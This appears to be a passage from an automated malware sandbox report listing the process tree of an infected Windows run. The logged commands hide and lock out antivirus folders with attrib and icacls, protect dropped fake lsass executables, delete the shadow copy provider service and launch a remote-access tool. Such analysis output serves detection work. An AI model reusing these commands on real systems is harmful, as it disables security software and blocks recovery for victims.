                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1704
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      icacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ATTRIB +H +S "c:\programdata\Malwarebytes"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      icacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        ATTRIB +H +S "C:\Programdata\MB3Install"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        icacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        ATTRIB +H +S "C:\KVRT_Data"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        icacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ATTRIB +H +S "C:\ProgramData\Norton"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          icacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ATTRIB +H +S "C:\ProgramData\Avg"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ATTRIB +H +S "C:\ProgramData\grizzly"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ATTRIB +H +S "C:\ProgramData\Doctor Web"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ATTRIB +H +S "C:\ProgramData\Indus"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATTRIB +H +S "C:\WINDOWS\McMwt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              icacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              icacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                timeout 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  icacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    icacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATTRIB +H +S "C:\ProgramData\Microsoft\Intel"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATTRIB +H +S "C:\ProgramData\Microsoft\Check"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATTRIB +H +S "C:\ProgramData\Microsoft\Temp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  sc delete swprv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "61080305-1198112166-1178986804-1425175592653895563-1728330038-5900636191267952209"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-340566999-548217168146496066414401101-2069694300174049731014945973171695323679"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-1198599022-1726811982030430550914510820115184052678187700-162141525-1979275971"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "5154099061884092586-2115491014636959790-87368279066514631-42138741-887777884"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "734703971-1701712221383730185-14006495131852558496-173754815615259221011931770709"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-125422934-647615124-1495635386-1182395009854903204412127128-101365938228755296"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-154308579-1678601706-511853665-1046124778-1820727312617693791-834465726144880146"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-199823649625250112516565566914995444501420107153-1185114275880297913-538662727"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "163291779518955460111827954893266065483-3709753092343494134039226471078313393"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-48164041162809635010101124671672876762639952210-568340238-130894371711759597"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "236385976450697000-1177854724-21334537-37008074443056652-11819929191589532342"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "-1836044107-830181771381109013731705026-184721967-201432998617188038101646784591"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-450660405-685038832631860376-1106227312500659040-4831338171718516371-1212296366"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "1407658579-1863306131-15225337901611799273-7164670541397844219-1553507324-1581375173"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-45849313486107254820164224861692362271253650926594576021761397449-210245207"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "662357821-2127869334786397421991659786-177155722319309177811422736674633286814"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "-11546811371254903639-727218312-239299286898855764632816437-1452728015571905500"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1712
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "198631264815730931881148816150569860864-1263653294256642555-2031291954187243773"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "1949619320-827450404603109604164405896-10927718752111254589-14898783661410649999"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "2146664157-1338268299-397148838199037271119379700972001390383-3088281602001697730"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-13640359451608347607-789789050-67487041-16742612481382647431900686905156302326"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-564859521-239384965-1800438243-932301863-1689016493-12702805431603240901-2022390255"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-2035615836349343902419528139183457804518770292901556517670669484738-2097965189"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "-718134543-1473650092-2092761251-2012319447570169612172234345119773422162110126162"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "-2096055747-3786708851112774399166661086717026199451365584087-105475459-2063761675"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-200778123853826692137580473714734189691689577821-1006416127722470136-168230054"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "499926101-8483990161390058709-176192812813463803459798363063080502011287516433"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "20916451851727072447-1050996151-1356460960-1562030629548990601998113640-1221459831"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "1962852480-161310012018770030541720148854-12393499224776498005498568271593458114"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "-1791631423-129364952-1790368360-873377687964036384-7894115001927898410-1754108902"
